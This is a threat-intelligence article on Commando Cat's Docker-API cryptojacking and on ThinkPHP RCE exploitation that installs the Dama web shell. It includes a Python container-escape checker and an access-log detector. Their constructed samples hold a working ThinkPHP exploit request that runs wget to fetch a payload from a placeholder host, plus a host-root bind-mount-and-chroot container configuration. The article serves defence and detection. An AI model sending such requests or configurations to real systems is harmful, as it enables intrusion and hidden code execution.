The cybersecurity landscape continues to be challenged by sophisticated threats, as evidenced by the recent activities attributed to a threat actor tracked as Commando Cat. The actor is currently running a cryptojacking campaign against poorly secured Docker instances: by abusing Docker Engine API endpoints that have been left exposed and unauthenticated, Commando Cat deploys cryptocurrency miners and profits from the compromised hosts' compute.
In a recent analysis, Trend Micro researchers Sunil Bharti and Shubham Singh revealed that the attackers launch a container from the cmd.cat/chattr Docker image and have it pull its payload from the adversary's command-and-control (C&C) infrastructure. What makes the campaign notable is that the image comes from the open-source Commando project (cmd.cat), which builds Docker images containing a requested command on demand, so the container looks innocuous to a casual review. The tactics were first documented earlier this year by Cado Security.
The attack chain targets misconfigured Docker remote API servers. Once the attacker can reach the API, they create a container from the cmd.cat/chattr image with the host's root filesystem bind-mounted into it, then run chroot into that mount to step out of the container and operate on the underlying host operating system (chroot alone cannot leave a container; the escape works because the host filesystem was mounted in when the container was created). The chain ends with curl or wget fetching a malicious cryptocurrency miner binary, likely ZiggyStarTux, from the C&C server.
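The chain above leaves a recognisable footprint in the Docker daemon's own configuration and container metadata. As an added example, not Trend Micro's or Cado's code, the Python script below flags containers whose configuration permits the chroot-to-host step (host root or Docker socket bind-mounted, privileged, host PID namespace, or chroot in the command line) and checks a daemon.json for a TCP listener without client TLS, which is the misconfiguration that lets the attacker reach the API in the first place. The inspect documents, the /hs mount path, the container names and both daemon.json fragments are constructed for illustration; only the image name cmd.cat/chattr comes from the campaign description.

```python
"""Flag Docker containers that can reach the host, and daemons that expose the API.

Added example, not the researchers' code. The inspect documents below are
hand-written to resemble 'docker inspect' output: cmd.cat/chattr is the image
named in the campaign; the mount path /hs, the container names and the
daemon.json fragments are assumptions for illustration.
"""
import json
from typing import Dict, List

# Host paths that hand a container the host: the root filesystem, or the
# Docker socket (control of the daemon is equivalent to root on the host).
DANGEROUS_SOURCES = {"/", "/var/run/docker.sock", "/run/docker.sock"}


def bind_source(bind: str) -> str:
    """Host-side path of a 'src:dst[:opts]' bind string."""
    return bind.split(":", 1)[0]


def assess_container(doc: Dict) -> List[str]:
    """Reasons a container looks escape-capable; an empty list means clean."""
    reasons = []
    host_cfg = doc.get("HostConfig") or {}
    cfg = doc.get("Config") or {}

    if host_cfg.get("Privileged"):
        reasons.append("privileged container")
    if host_cfg.get("PidMode") == "host":
        reasons.append("shares the host PID namespace")
    for bind in host_cfg.get("Binds") or []:
        src = bind_source(bind)
        if src in DANGEROUS_SOURCES:
            reasons.append(f"host path {src} bind-mounted ({bind})")

    # chroot into a mounted host root is the escape step the article describes.
    argv = []
    for part in (cfg.get("Entrypoint"), cfg.get("Cmd")):
        if isinstance(part, list):
            argv.extend(part)
        elif isinstance(part, str):
            argv.append(part)
    if "chroot" in argv:
        reasons.append("command runs chroot: " + " ".join(argv))

    image = cfg.get("Image") or ""
    if image.startswith("cmd.cat/"):
        reasons.append("image from the Commando (cmd.cat) project: " + image)
    return reasons


def find_escape_capable(docs: List[Dict]) -> Dict[str, List[str]]:
    """Container name -> reasons, for every container that is flagged."""
    flagged = {}
    for doc in docs:
        reasons = assess_container(doc)
        if reasons:
            flagged[doc.get("Name", "?")] = reasons
    return flagged


def exposed_api_risk(daemon_cfg: Dict) -> List[str]:
    """Flag daemon.json 'hosts' entries that serve the API over TCP without client TLS."""
    issues = []
    for host in daemon_cfg.get("hosts") or []:
        if host.startswith("tcp://") and not daemon_cfg.get("tlsverify"):
            issues.append(host + " accepts API calls without a client certificate; "
                          "set tlsverify/tlscacert/tlscert/tlskey or bind to a private interface")
    return issues


# Constructed samples: one container modelled on the campaign, one benign.
SAMPLE_INSPECT = [
    {
        "Name": "/suspicious",
        "Config": {"Image": "cmd.cat/chattr", "Cmd": ["chroot", "/hs"], "Entrypoint": None},
        "HostConfig": {"Binds": ["/:/hs"], "Privileged": False},
    },
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.25", "Cmd": ["nginx", "-g", "daemon off;"],
                   "Entrypoint": ["/docker-entrypoint.sh"]},
        "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
    },
]
# Weak daemon.json (plaintext API on every interface) beside a hardened one (mutual TLS).
WEAK_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}
HARDENED_DAEMON = {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
                   "tlsverify": True, "tlscacert": "/etc/docker/ca.pem",
                   "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}

if __name__ == "__main__":
    import sys
    # On a real host: docker inspect $(docker ps -aq) | python3 docker_escape_check.py
    docs = SAMPLE_INSPECT if sys.stdin.isatty() else json.load(sys.stdin)
    print(json.dumps(find_escape_capable(docs), indent=2))
    print(json.dumps({"weak": exposed_api_risk(WEAK_DAEMON),
                      "hardened": exposed_api_risk(HARDENED_DAEMON)}, indent=2))
```

Run it against real output by piping `docker inspect $(docker ps -aq)` into it; the container-level checks are worth running as a scheduled job, because a container created through an exposed API never passes through any CI or admission policy you may have.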
The implications are significant: packaging the attack in a legitimately built Docker image lets the cryptojacking scripts slip past detection that keys on known-malicious images or binaries. Researchers have emphasized that this illustrates a growing trend of attackers abusing Docker misconfigurations while staying under the radar.
Separately, Akamai has reported that a suspected Chinese-speaking threat actor is exploiting years-old remote code execution flaws in ThinkPHP applications, CVE-2018-20062 and CVE-2019-9082, to deploy a web shell referred to as Dama. The Dama shell was first seen in an attack that began on October 17, 2023.
According to Akamai researchers, the exploit retrieves additional obfuscated code from another, already-compromised ThinkPHP server. Having gained a foothold, the adversary installs the Dama web shell to keep persistent access to the targeted server. The shell is outfitted with advanced functionality for gathering system data, uploading files, scanning network ports, escalating privileges, and navigating the file system. It also lets the operator edit and delete files and manipulate their timestamps, the last of which is an anti-forensics measure meant to hide the intrusion from review.
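Because the initial foothold is a request that abuses a framework route, the exploitation attempt itself is visible in ordinary web server access logs. As an added example, not Akamai's code, the Python detector below scans log lines for the request shape that public exploits for CVE-2018-20062 and CVE-2019-9082 share (an `s` route parameter reaching `\think\app/invokefunction` with `call_user_func_array`), decodes the callable and its arguments, and separates command execution from reconnaissance probes. The log lines, client addresses, URLs and timestamps are constructed, and nothing in them is an indicator of the Dama shell specifically.

```python
"""Detect ThinkPHP 'invokefunction' RCE attempts in web server access logs.

Added example, not Akamai's code. The request shape matched here is the one
used by public exploits for CVE-2018-20062 and CVE-2019-9082: an 's' route
parameter that reaches \\think\\app::invokefunction and call_user_func_array.
The log lines below are constructed; addresses and paths in them are made up.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote_plus

# The route is abused through the 's' parameter; the class name varies by
# framework version and the backslashes are often URL-encoded.
INVOKE_RE = re.compile(r"\\think\\(?:app|container)/invokefunction", re.IGNORECASE)
# Common log format: client, ident, user, [time], "METHOD target PROTO", status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# PHP callables that hand the attacker code or command execution.
EXEC_CALLABLES = {"system", "shell_exec", "exec", "passthru", "popen", "proc_open",
                  "assert", "eval", "file_put_contents"}


def analyse_request(target: str) -> Optional[Dict[str, str]]:
    """Return details if the request target looks like an invokefunction attempt, else None."""
    _path, _sep, query = target.partition("?")
    params = parse_qs(query, keep_blank_values=True)  # decodes each value once
    route = unquote_plus(params.get("s", [""])[0])    # handle double encoding
    if not INVOKE_RE.search(route):
        return None
    callee = params.get("vars[0]", [""])[0]           # the callable passed to call_user_func_array
    args = params.get("vars[1][]", [])                # its argument list
    return {
        "route": route,
        "function": params.get("function", [""])[0],
        "callee": callee,
        "args": " ".join(args),
        "kind": "command-execution" if callee.lower() in EXEC_CALLABLES else "probe",
    }


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Parse each log line and collect every request that analyse_request flags."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = analyse_request(m.group("target"))
        if found:
            found.update(ip=m.group("ip"), status=m.group("status"), time=m.group("time"))
            hits.append(found)
    return hits


# Constructed sample log: a command-execution attempt that pulls a second-stage
# file from a remote host, an encoded md5('Hello') probe, and two benign requests.
SAMPLE_LOG = [
    '198.51.100.7 - - [02/Jan/2024:14:02:11 +0000] "GET /index.php?s=index/\\think\\app/invokefunction'
    '&function=call_user_func_array&vars[0]=system&vars[1][]=wget+http://203.0.113.5/p.txt+-O+/tmp/p.php'
    ' HTTP/1.1" 200 512',
    '198.51.100.7 - - [02/Jan/2024:14:02:13 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction'
    '&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 48',
    '192.0.2.20 - - [02/Jan/2024:14:03:00 +0000] "GET /index.php?s=index/user/login HTTP/1.1" 200 2311',
    '192.0.2.21 - - [02/Jan/2024:14:03:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    import sys
    # Real use: python3 thinkphp_rce_scan.py < /var/log/nginx/access.log
    source = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin
    for hit in scan_log([line.rstrip("\n") for line in source]):
        print(f'{hit["time"]} {hit["ip"]} {hit["kind"]}: {hit["callee"]}({hit["args"]}) -> {hit["status"]}')
```

A 200 response to the `system` request is the line to act on: on a patched ThinkPHP the route no longer reaches invokefunction, so a successful status on such a request means the host is vulnerable and the fetched file should be assumed to be the web shell stage.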
The persistence and effectiveness of these attacks illustrate a concerning trend in which adversaries rely on full-featured web shells designed for extensive control over victim systems. Notably, not all targeted entities were running ThinkPHP, suggesting the attackers select potential victims indiscriminately rather than fingerprinting the framework first.
From a tactical perspective, both campaigns map onto MITRE ATT&CK techniques: Initial Access through Exploit Public-Facing Application (T1190), whether the exposed Docker API or the ThinkPHP RCE flaws; Execution and Privilege Escalation via Deploy Container (T1610) and Escape to Host (T1611) in the Commando Cat case; Persistence via Server Software Component: Web Shell (T1505.003) in the ThinkPHP case; Ingress Tool Transfer (T1105) for the curl/wget and web shell downloads; and Resource Hijacking (T1496) as the cryptojacking objective. As these threats evolve, it is crucial that the people operating such systems stay vigilant and tailor their controls to these attacks: keep the Docker API off the public internet or behind mutual TLS, and keep web frameworks such as ThinkPHP patched.